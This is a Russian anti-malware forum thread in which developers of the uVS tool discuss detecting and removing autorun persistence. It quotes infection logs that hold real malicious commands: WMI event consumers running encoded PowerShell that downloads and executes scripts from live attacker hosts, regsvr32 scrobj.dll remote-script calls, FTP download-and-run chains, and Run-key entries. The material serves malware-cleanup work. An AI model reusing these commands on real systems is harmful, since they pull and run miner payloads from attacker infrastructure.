Перейти к содержанию

Recommended Posts

PR55.RP55

 Windows 10 Pro x64 (NT v10.0 SP0) build 15063  [C:\WINDOWS]

-----------------------

Полное имя                  {6\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{60BD49A6-240E-48ef-8D73-AC8244BE1D85}\CLSID
------------------------

Полное имя                  {E\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{EAC2F030-5937-414C-9B7A-6B57F7C072E8}\CLSID

------------------------

Тема\образ.

http://www.tehnari.ru/f35/t262097/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 часов назад, PR55.RP55 сказал:

{6\[CLSID]

содержимое ключа нужно, без него не починить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Такая вот история.

 

 

2018-12-13.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
33 минут назад, PR55.RP55 сказал:

Такая вот история.

и что не так?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
11 часов назад, demkd сказал:

и что не так? 

Почему  в списке два процесса uVS - ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 часа назад, PR55.RP55 сказал:

Почему  в списке два процесса uVS - ?

Windows 64-х битный потому и 2 процесса, один под эмулятором, второй 64-х битный.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
Цитата

Добавлена поддержка WMI классов на базе __TimerInstruction.

судя по свежему образу, видится запись в WMI

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\FUCKYOUMM2_ITIMER
Имя файла                   FUCKYOUMM2_ITIMER
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     fuckyoumm2_itimer
IntervalBetweenEvents       10800000
SkipIfPassed                FALSE

                           

ANDREY-PC_2018-12-20_09-32-21_v4.1.2.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 21.12.2018 at 8:28 AM, santy сказал:

Добавлена поддержка WMI классов на базе __TimerInstruction.

И здесь:  http://www.tehnari.ru/f183/t262393/

Сразу две записи:

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\SETHOMEPAGE INTERVAL TIMER
Имя файла                   SETHOMEPAGE INTERVAL TIMER
Тек. статус                   в автозапуске
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     SethomePage Interval Timer
IntervalBetweenEvents       900000
SkipIfPassed                FALSE

--------------------

+

.[EVENTFILTER SETHOMEPAGE2]

                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

А здесь...

Тема\образ: http://www.tehnari.ru/f35/t262401/

------------------

Записи:

FILE:///C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Тема: http://www.tehnari.ru/f35/t262401/

uVS  видит запись: 

Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org

------------
Но в автоскрипте не будет нормального удаления.

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

 

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
8 часов назад, PR55.RP55 сказал:

Но в автоскрипте не будет нормального удаления.

по этому образу в автоскрипте будут две команды:

delref HTTP://WWW.DIPLADOKS.ORG/
delref WWW.DIPLADOKS.ORG

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

 

Цитата

Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
RUN                         (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   (ЦИФР. ПОДПИСЬ !~ ДЕЙСТВИТЕЛЬНА)(1) [auto (0)]
RUN.CMD                     (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   ( ~ CMD.EXE)(1) [auto (0)]
KB-RIBAKI.ORG               ( ~ REG ADD)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VLADISLAV
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\Actions
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\
                            
Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org


                            

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 08.01.2019 at 8:32 AM, santy сказал:

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

Может и должна.

В теме были применены две команды:

deltsk WWW.DIPLADOKS.ORG

delref HTTP://WWW.DIPLADOKS.ORG/

Но, как мы видим в FRST после этого осталась запись:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

--------------

"HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Vladislav" => removed successfully

------

Цитата

 4.0.21
---------------------------------------------------------
o Добавлена возможность удалять события WMI и задачи без удаления всех ссылок на файл/объект.
Скриптовые команды: delwmi и deltsk

Исходя из этой логики команда: deltsk  не удаляет ссылки.

В 07.01.2019 at 11:48 PM, PR55.RP55 сказал:

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

если deltsk будет удалять и задачи, связанные с данным объектом и все ссылки в реестре на объект, тогда зачем нужен дубль команды, когда все это умеет делать delref.

значит, эта команда (deltsk) введена для того чтобы удалить только задачи, связанные с объектом автозапуска. Например, сам объект автозапуска может быть даже с белой цифровой записью и содержит ряд полезных ссылок в реестре, которые необходимы для функционирования системы, но в тоже время может быть использован через левую задачу для деструктивных действий. Поэтому, в данном случае мы не можем применить delref к объекту, а только deltsk. (Очевидно, при этом будут удалены все задачи, связанные с данным объектом). Если необходимо удалить связанные с объектом задачи  поштучно, в этом случае можно использовать контекстное удаление из info, например: del %Sys32%\TASKS\VLADISLAV, del %Sys32%\TASKS\VLADISLAV1, del %Sys32%\TASKS\VLADISLAV2

 

команда deltsk WWW.DIPLADOKS.ORG скорее всего была применена без внимания, что в автозапуске остался еще запуск по данной ссылке через ключ реестра.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

-----------

Проблема в том, что оператор не видит всей картины.

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

Цитата

Полное имя                  HTTP://WWW.DIPLADOKS.ORG/
Имя файла                   HTTP://WWW.DIPLADOKS.ORG/
CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 


Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org


CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 


CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

RP55,

ничто не мешает оператору заглянуть внутрь инфо подозрительных объектов чтобы определиться какой командой лучше его зачистить из системы. или delall, или delref, или deltsk или достаточно просто использовать del,

достаточно при этом использовать фильтрующее выражение и обе записи окажутся рядом.
 

Цитата

 

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

 

а вот каша из строк инфо, которые принадлежат разным объектам не нужна.

отсутствие привязки этих строк к реальному объекту автозапуска из списка только затруднит выбор команды.

скажем, тот же объект в cmdline может быть запущен из lnk файла, и вместо очистки командной строки в ярлыках будет запущено удаление ярлыков.

---------

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 08.01.2019 at 4:29 PM, santy сказал:

каша из строк инфо, которые принадлежат разным объектам не нужна.

Что мешает создать переход к нужному объекту ?

Выполнили поиск > посмотрели информацию > переход к нужному объекту и на месте приняли решение.

Или создать суммирующее окно Инфо. где будут все объекты и все ссылки удовлетворяющие запросу.

С выделением результата поиска.

В 08.01.2019 at 4:29 PM, santy сказал:

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

Давно нужно сделать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 08.01.2019 at 5:52 PM, PR55.RP55 сказал:

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

ну, в данной строке HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start есть объекты, которые присутствуют в системе, поэтому вряд ли эта строка попадет под удаление отсутствующих объектов. в итоге, у юзера будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Частичное исправление параметров (без удаления ключа), если необходимо, решается сейчас твиками. например: regt 12

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Мне кажется, что идея с удалением фрагмента\части интересная.

Единственно нужен такой метод при котором операция не будет приводить к негативным последствиям в виде старта cmd.exe, браузера, командных окон и т.д.

твик regt 12 - команда возвращает запись в исходное значение...

Значит сопоставив две записи:

1) Запись модифицированная

2) Исходная запись - которая сейчас содержится в твике.

3) Получаем разницу.

4) Эту разницу программа и обрабатывает.

-----------

Нужен банк\база стандартных\регулярных исходных значений и отталкиваясь от этого и обработать объект.

8 часов назад, santy сказал:

будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Или выявлять и удалять эти пустые\битые элементы. Что вроде бы и так реализовано.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
13 минут назад, PR55.RP55 сказал:

Мне кажется, что идея с удалением фрагмента\части интересная.

может и интересная,

но в данном случае идея с очисткой ссылок и задач, реализованная в программе работает.

командная строка (cmdline), которая может содержать чистые файлы (cmd.exe, wmic.exe, regsvr32.exe, explorer.exe и т.д., через которые могут быть выполнены деструктивные действия), разбивается на отдельные элементы списка автозапуска, и каждый элемент, который был выделен из командной строки, содержит всю инфо, из которой он был выделен. Т.о. если применяется delref к этим элементам, то удаляются из реестра или из tasks все параметры, ключи и actions запуска деструктивного действия.

При этом, сам чистый файл не затрагивается,  не удаляется, а удаляется только его деструктивное применение, прописанное через задачи, или ключи реестра.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

;uVS v4.1.2 [http://dsrt.dyndns.org] [Windows 6.1.7601 SP1 Service Pack 1]
; WMI: обработчики событий

Цитата

 

ПОДОЗРИТ.  | хттп]://173.208.139.170/2.TXT
ПОДОЗРИТ.  | хттп://35.182.171.137/3.TXT
ПОДОЗРИТ.  | хттп://WMI.1217BYE.HOST/1.TXT
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://173.208.139.170/S.TXT')&POWERSHELL.EXE
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://35.182.171.137/S.JPG')||REGSVR32
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://WMI.1217BYE.HOST/S.PS1')&POWERSHELL.EXE
автозапуск | &POWERSHELL.EXE
автозапуск | C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
автозапуск | KERNCAP.VBS
автозапуск | WMI:\\.\ROOT\SUBSCRIPTION\NTEVENTLOGEVENTCONSUMER\SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER]
автозапуск | C:\WINDOWS\SYSTEM32\SCROBJ.DLL


 

 

АЛЕКСЕЙ-HP_2019-01-11_21-19-41_v4.1.2.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
1 час назад, santy сказал:

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

разобрать все многообразие командных строк просто невозможно, мусор всегда будет

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

consumer_name fuckyoumm4 и consumer_filter fuckyoumm3 засветились в инфо cmd.exe

 

Цитата

 

Полное имя                  C:\WINDOWS\SYSTEM32\CMD.EXE
Имя файла                   CMD.EXE
Тек. статус                 АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER.LIST(CONSUMER_NAME ~ FUCKYOUMM)(1) [delall (0)]
TASK.MUSA                   (ССЫЛКА ~ TASKS\MYSA)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
Процесс                     64-х битный
File_Id                     4CE798E559000
Linker                      9.0
Размер                      345088 байт
Создан                      21.11.2010 в 06:23:55
Изменен                     21.11.2010 в 06:23:55
                            
TimeStamp                   20.11.2010 в 09:46:13
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            Cmd.Exe.MUI
Версия файла                6.1.7601.17514 (win7sp1_rtm.101119-1850)
Описание                    Обработчик команд Windows
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
pid = 1708                  Алексей-HP\Алексей
CmdLine                     "C:\Windows\System32\cmd.exe" /c "color 17 & title AutorunsVTchecker & "C:\Users\CD86~1\AppData\Local\Temp\7ZipSfx.000\autorunsc64.exe" -accepteula -a * -vt -vs"
Процесс создан              21:17:13 [2019.01.11]
С момента создания          00:02:35
CPU                         0,01%
CPU (1 core)                0,01%
parentid = 3136             
pid = 1900                  NT AUTHORITY\система
CmdLine                     C:\Windows\system32\cmd.EXE /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
Процесс создан              21:06:50 [2019.01.11]
С момента создания          00:12:58
CPU                         0,00%
CPU (1 core)                0,00%
parentid = 1620             C:\WINDOWS\SYSTEM32\TASKENG.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>S&ECHO TEST>>S&ECHO 1433>>S&ECHO BINARY>>S&ECHO GET A.EXE C:\WINDOWS\UPDATE.EXE>>S&ECHO BYE>>S&FTP -S:S&C:\WINDOWS\UPDATE.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>P&ECHO TEST>>P&ECHO 1433>>P&ECHO GET S.DAT C:\WINDOWS\DEBUG\ITEM.DAT>>P&ECHO BYE>>P&FTP -S:P
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>PS&ECHO TEST>>PS&ECHO 1433>>PS&ECHO GET S.RAR C:\WINDOWS\HELP\LSMOSEE.EXE>>PS&ECHO BYE>>PS&FTP -S:PS&C:\WINDOWS\HELP\LSMOSEE.EXE
SHA1                        0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
MD5                         5746BD7E255DD6A8AFA06F7C42C1BA41
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm4
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatecmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
Filter_Name                 fuckyoumm3
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"fuckyoumm4\"";
    Filter = "__EventFilter.Name=\"fuckyoumm3\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "fuckyoumm3";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll";
    Name = "fuckyoumm4";
};

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA2
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA3
                           

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
26 минут назад, santy сказал:

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

в принципе ничего нового, просто затрудняет машинный анализ вот и все, возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
42 минут назад, demkd сказал:

возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

а что здесь означает ключ -enc? закодированный объект?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Ego Dekker
      ESET Cyber Security/ESET Cyber Security Pro были обновлены до версии 6.7.555.
    • stas.panov
      Объяснение очень доходчивое  и по делу. Большое спасибо за информацию и ссылки. 
    • Quincy
      Серёга Лысый известный балабол же
    • Александр Полиграф
      Проведение расследований с применением полиграфа. Выявление сотрудников "сливающих" информацию, осуществляющих попытки- получения данных, шпионаж, работа на конкурентов, сбор компромата и т.п. Осуществляем выезд к вам в офис. Гарантия конфиденциальности.  poligraf.msk.ru ПОЛИГРАФ МСК.pdf
    • PR55.RP55
      vesorv 1) С отключенным интернетом вы не сможете активировать лицензию на антивирус. а раз не сможете - то и не получите защиту. Значит активируем антивирус > Создаём образ системы и переносим его на внешний носитель. Получаем возможность проводить тестирование повторно. 2) Вам для тестирования не нужны "свежие" угрозы. Разработчик регулярно обновляет установочный пакет. Скажем за 2018 год вышла - 12 версия антивируса, затем вышла версия. 12.01> 12.02 > 12.03  и т.д. Интервал между версиями пару месяцев. За пару месяцев ничего принципиального и прорывного в защите не сделать. Установив вместо версии: 12.03  "устаревшую" версию 12.02 вы получите и устаревшую базу сигнатур вирусов. И здесь можно тестировать угрозы о которых антивирус не осведомлён. 3) Антивирус нужен для постоянной защиты. Установка не производиться на заражённую машину. так, как установочный пакет не предназначен для очистки системы. ( Да, в рекламных целях разработчик может написать, что есть такая возможность... Однако ) Вирус может повредить реестр, заблокировать работу Windows Installer, модифицировать критически важные системные файлы - система просто не будет работать должным образом. _Эффективная очистка возможна только на НЕ активной системе - при работе с Live CD или при загрузке с другой не заражённой системой. 4) Отключать нужно не только интернет  - но  и беспроводные блютус и Wi-Fi иначе вы рискуете получить заражение всех доступных устройств. 5) Многие вредоносные программы вы просто не сможете запустить. так, как могут быть ограничения на регион распространения  - тот кто заказывал разработку\модификацию например рассчитывает на атаку конкретной страны, банка. 6) По очистке и лечению. Это не одно и тоже. Есть антивирусы которые удаляют файлы\угрозы но при этом не очищают реестр от лишних записей. Удаление файла\угрозы без удаления записей может приводить к ошибкам в работе системы. Лечение файлов - здесь речь идёт прежде всего о файловых вирусах. Антивирус должен найти заражённый файл, найти нужный участок и очистить - причём очистить так, чтобы сохранилась работоспособность системы. Но очистка исполняемых файлов не имеет смысла - всё равно _современная система не сможет нормально работать так, как у файла не будет ЭЦП... а если критически важный  файл не пройдёт проверку на наличие ЭЦП то и система не запуститься... Единственно, что можно сделать - это заменить файл на оригинальный. А учитывая число файлов, разнообразие их версий  - это становиться нетривиальной задачей. Некоторые антивирусы\сканеры имеют архив с такими файлами ( для замены: EXPLORER.EXE; NTDETECT.COM; NTSD.EXE и т.д ) А большинство антивирусов таких архивов не имеет. 7) Вы не учитываете уровень ложных срабатываний\определений. Антивирус  может сработать на чистый файл. Значит нужно проверять систему ещё до работы с реальными угрозами. 8) Угроза, или нет ? Это философский вопрос. Здесь каждый разработчик решает сам - что является угрозой, а что нет. т.е. на файл ХХХ одни антивирус сработает - а другой антивирус на файл ХХХ не сработает. + Программы разработанные спец. службами например страна ****а разработала вирус с целью нарушения работы оборудования, в целях шпионажа, получения удалённого доступа. Разве разработчики антивирусов находящиеся под её юрисдикцией будут искать эту угрозу ? 9) Легальные шпионские программы - одни антивирусы их будут находить, а другие антивирусы их находить не будут. Под легальными нужно понимать такие компоненты системы которые устанавливает разработчик оборудования - мониторинг - обнаружение украденного оборудования - диагностические отчёты. т.е. антивирусы по умолчанию находятся вне равных условий. 10) У всех разное железо - и производитель распространяет установщики  с некими средними настройками - чтобы на старых\слабых PC не наблюдалось зависание. С разными настройками эвристики будет  разная  скорость\эффективность работы. Значит нужно, или тестировать всё по умолчанию, или накручивать параметры на максимум. Нужно будет оценивать стабильность работы системы после внесения изменений в работу антивируса. 11) Куда ушли ?  Да куда угодно. Потеряли интерес, стало больше информации и меньше времени на её обсуждение. Помните песню: " Куда уехал цирк ? он был ещё вчера " https://www.comss.ru/page.php?id=5777 Дело в том, что всё уже давно обсудили, и вся информация есть в сети. а все эти _публичные тестирования ( как бы это помягче сказать... ) Средняя температура по больнице в норме !    
×